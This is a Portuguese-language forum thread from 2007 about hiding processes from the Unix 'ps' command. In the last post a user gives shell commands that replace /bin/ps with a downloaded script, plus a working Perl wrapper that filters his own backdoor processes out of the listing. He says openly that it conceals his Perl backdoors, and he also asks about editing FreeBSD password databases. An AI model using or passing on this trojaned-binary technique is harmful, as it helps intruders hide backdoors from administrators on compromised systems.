Esconder processo ps aux

**andersoneduardo** · 10-12-2007, 16:41

Galera Under-linux!
alguem sabe como esconder o processo do ps , mudar o nome algo assim!
tem um programa nao lembro nome q faz isso mais estou querendo fazer com as ferramentas do proprio sistema!vi uns artigos mais nao funfou!rs
seja BSD ou Linux!

falow

**PEdroArthurJEdi** · 11-12-2007, 22:09

sabe programar amigo?
Na revista phrack tem um artugo sobre como esconder processos... procure lá!

**andersoneduardo** · 18-12-2007, 23:13

opa.!
eles falam se nao me engano de alterar o codigo fonte do ps para nao mostrar certo processos e tambem algo com LKM!nao mexo com C!rsrs

isso ainda to estudando!

aproveitando!
tem como editar o arquivo spwd.db e pwd.db é la q fica os verdadeiros arquivo de senha do FreeBSD né?
tbm to a estudando isso!rsrs

falow!

Obrigadao ae cara!

**PEdroArthurJEdi** · 19-12-2007, 01:08

Alterar os fontes do ps não um método muito legal...
Eu uso essa técnica para esconder processo em uma honeypot...
O sujeito pode testar o md5 sum do binário e ver que é uma farça...
Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...

Não entendo de BSD's

**andersoneduardo** · 20-12-2007, 09:33

Postado originalmente por PEdroArthurJEdi

Alterar os fontes do ps não um método muito legal...
Eu uso essa técnica para esconder processo em uma honeypot...
O sujeito pode testar o md5 sum do binário e ver que é uma farça...
Os LKM são o método mais "hard core" porém você só precisará codificar o mecanismo de camuflagem uma vez...

Não entendo de BSD's

Opa cara!

to criando um script em perl ta funcionando!
rsrs
falow

abrçs!

**PEdroArthurJEdi** · 22-12-2007, 15:22

posta ai pra gente

**andersoneduardo** · 23-12-2007, 11:10

Postado originalmente por PEdroArthurJEdi

posta ai pra gente

Copiamos o ps original para ps.old!

hacr#mv /bin/ps /bin/ps.old

Baixando e copiando o Fake PS!

hacr#fetch Your Page.com
hacr#mv ps.pl /bin/ps
hacr#chmod +x /bin/ps

Obs:Você tem que alterar o script de acordo com sua Backdoor!

No meu caso minhas backdoors são feitas em Perl ae o processo fica com o nome de (perl5.8.8).

Segue o codigo:

#!/usr/bin/perl
#Credits by [email protected]
use warnings;
use strict;

my $string = $ARGV[0];
if($string){
my @net = qx/ps.old $string/;
my @hide = grep(!/(perl5.8.8)/, @net);
my @dd = grep(!/ps.old/, @hide);
print @dd;
}
else
{
my @nett = qx/ps.old/;
my @hidee = grep(!/(perl5.8.8)/, @nett);
my @d = grep(!/ps.old/, @hidee);
print @d;
}

no meu blog tbm tem do netstat e to criando do socket!

Esconder processo ps aux

Ferramentas de Tópicos

Esconder processo ps aux